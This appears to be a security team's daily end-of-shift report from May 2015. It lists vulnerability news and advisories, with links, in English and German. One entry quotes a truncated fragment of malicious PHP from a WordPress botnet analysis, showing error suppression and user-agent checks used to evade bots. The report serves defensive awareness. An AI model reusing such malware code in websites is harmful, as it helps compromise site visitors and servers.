End-of-Shift report
Timeframe: Dienstag 26-05-2015 18:00 − Mittwoch 27-05-2015 18:00
Handler: Stephan Richter
Co-Handler: n/a
This is not the UEFI backdoor you are looking for
This is currently the top story on the Linux subreddit. It links to this Tweet which demonstrates using a System Management Mode backdoor to perform privilege escalation under Linux. This is not a story.But first, some background. System Management Mode (SMM) is a feature in most x86 processors since the 386SL back in 1990. It allows for certain events to cause the CPU to stop executing the OS, jump to an area of hidden RAM and execute code there instead, and then hand off back to the OS...
http://mjg59.dreamwidth.org/35110.html
Breach detection: Five fatal flaws and how to avoid them
When the Sarbanes-Oxley Act of 2002 was passed, it fell on corporate security teams to translate its requirements into technical controls. That threw the IT Security function into the deep end of the ...
http://feedproxy.google.com/~r/HelpNetSecurity/~3/uoHRSOyKltE/article.php
Five Mistakes MSSPs Should Avoid
MSSPs, or Managed Security Service Providers, are at an exciting point where market acceptance, awareness and demand have converged. I view this as a positive for a potential MSSP but also for the customers and businesses they will protect, enhancing security for everyone. However, excitement and the prospect of profits can create haste, and with haste comes an increased risk of mistakes. In my role at AlienVault, Ive been fortunate enough to work with and help ensure the success of a number of...
https://www.alienvault.com/blogs/security-essentials/five-mistakes-mssps-should-avoid
Over 30% of Official Images in Docker Hub Contain High Priority Security Vulnerabilities
Docker Hub is a central repository for Docker developers to pull and push container images. We performed a detailed study on Docker Hub images to understand how vulnerable they are to security threats. Surprisingly, we found that more than 30% of official repositories contain images that are highly susceptible to a variety of security attacks (e.g., Shellshock, Heartbleed, Poodle, etc.). For general images...
http://www.banyanops.com/blog/analyzing-docker-hub/
Jetzt patchen: Synology-NAS über Fotoalbum angreifbar
Synologys Web-Fotoalbum Photo Station gewährt Angreifern ungewollt Zugriff auf DiskStation NAS-Systeme. Wer nicht will, dass Fremde beliebigen Code auf dem eigenen NAS ausführen, sollte den Patch des Herstellers jetzt einspielen.
http://heise.de/-2668853
How to Prevent a Domain Name Theft
1. Introduction The domain names may cost far more than a real estate. For instance, Facebook paid USD 8.5 million to buy fb.com. The high prices of the domain names attract not only businesses, but also thieves. The domain name theft can be huge trouble for companies because it effects their brand and reputation. This...
http://resources.infosecinstitute.com/how-to-prevent-a-domain-name-theft/
SQL-Injection-Lücke in xt:Commerce
Sicherheitsupdates schließen in der Shop-Software eine Lücke, durch die Angreifer potenziell Datenbankbefehle einschleusen können.
http://heise.de/-2667569
Possible Wordpress Botnet C&C: errorcontent.com, (Tue, May 26th)
Thanks to one of our readers, for sending us this snipped of PHP he found on a Wordpress server (I added some line breaks and comments in red for readability): #2b8008# ">">/* turn off error reporting */ @ini_set(display_errors ">/* do not display errors to the user */ $wp_mezd8610 = @$_SERVER[HTTP_USER_AGENT">/* only run the code if this is Chrome or IE and not a bot */ if (( preg_match (/Gecko|MSIE/i, $wp_mezd8610) !preg_match (/bot/i, $wp_mezd8610))) {
https://isc.sans.edu/diary.html?storyid=19733&rss
Researchers Exploit Patched Windows Group Policy Bug
Researchers from Core Security were able to exploit a security vulnerability in Windows group policy -- MS15-011 -- that was patched by Microsoft in February.
http://threatpost.com/researchers-exploit-patched-windows-group-policy-bug/113000
Online-Dienst erstellt maßgeschneiderte Krypto-Trojaner
Die Einstiegshürde für angehende Online-Erpresser ist erneut gesunken: Ein Dienst im Tor-Netz erstellt nach wenigen Klicks den individuellen Erpressungs-Trojaner. Falls ein Opfer das geforderte Lösegeld zahlt, verdienen die Betreiber mit.
http://heise.de/-2668860
Security: Zwei neue Exploits auf Router entdeckt
Unsichere Router sind aktuell von gleich zwei Versionen von Malware bedroht. Die eine verteilt Spam über soziale Medien, die andere leitet Anfragen auf manipulierte Webseiten um. (Router, Virus)
http://www.golem.de/news/security-zwei-neue-exploits-auf-router-entdeckt-1505-114294-rss.html
extjs Arbitrary File Read / ssrf Vulnerability
Topic: extjs Arbitrary File Read / ssrf Vulnerability Risk: High Text:Hi all: Baidu Security Team found a vulnerability in extjs,with this vulnerability we can read arbitrary file and request...
http://cxsecurity.com/issue/WLB-2015050162
USN-2622-1: OpenLDAP vulnerabilities
Ubuntu Security Notice USN-2622-126th May, 2015openldap vulnerabilitiesA security issue affects these releases of Ubuntu and its derivatives: Ubuntu 15.04 Ubuntu 14.10 Ubuntu 14.04 LTS Ubuntu 12.04 LTSSummaryOpenLDAP could be made to crash if it received specially crafted networktraffic.Software description openldap - OpenLDAP utilities DetailsIt was discovered that OpenLDAP incorrectly handled certain search queriesthat returned empty attributes. A remote attacker could use this issue tocause...
http://www.ubuntu.com/usn/usn-2622-1/
Cisco IP Phone 7861 Denial of Service Vulnerability
http://tools.cisco.com/security/center/viewAlert.x?alertId=39011
ZDI-15-240: Dell NetVault Backup Heap Buffer Overflow Remote Code Execution Vulnerability
This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Dell NetVault Backup. Authentication is not required to exploit this vulnerability.
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/y6osEWmyti0/
ZDI-15-244: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicies Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/NFGleCbsATc/
ZDI-15-243: Arcserve Unified Data Protection Management Service EdgeServiceImpl getBackupPolicy Information Disclosure Vulnerability
This vulnerability allows remote attackers to disclose information on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/OV8j2fD9GSM/
ZDI-15-242: Arcserve Unified Data Protection Management Service exportServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability
This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/CxxqPV5u-0s/
ZDI-15-241: Arcserve Unified Data Protection Management Service reportFileServlet Directory Traversal Information Disclosure and Denial of Service Vulnerability
This vulnerability allows remote attackers to disclose and delete files on vulnerable installations of Arcserve Unified Data Protection. Authentication is not required to exploit this vulnerability.
http://feedproxy.google.com/~r/ZDI-Published-Advisories/~3/MNmtjnSQ_b4/
SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
SAP NetWeaver XML External Entity Processing Flaw Lets Remote Users Obtain Potentially Sensitive Information
http://www.securitytracker.com/id/1032402
Security Advisory: Point-to-Point Protocol (PPP) vulnerability CVE-2015-3310
(SOL16686)
https://support.f5.com:443/kb/en-us/solutions/public/16000/600/sol16686.html?ref=rss
lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries
lighttpd Input Validation Flaw Lets Remote Users Inject Log File Entries
http://www.securitytracker.com/id/1032405
Rockwell Automation RSView32 Weak Encryption Algorithm on Passwords
This advisory was originally posted to the US-CERT secure Portal library on May 12, 2015, and is being released to the NCCIC/ICS-CERT web site. This advisory provides mitigation details for a password encryption vulnerability in RSView32.
https://ics-cert.us-cert.gov/advisories/ICSA-15-132-02
Thycotic Password Manager Secret Server iOS Application MITM
Topic: Thycotic Password Manager Secret Server iOS Application MITM Risk: Medium Text:Thycotic Password Manager Secret Server iOS Application - MITM SSL Certificate Vulnerability --
http://www.info-sec.ca/adviso...
http://cxsecurity.com/issue/WLB-2015050167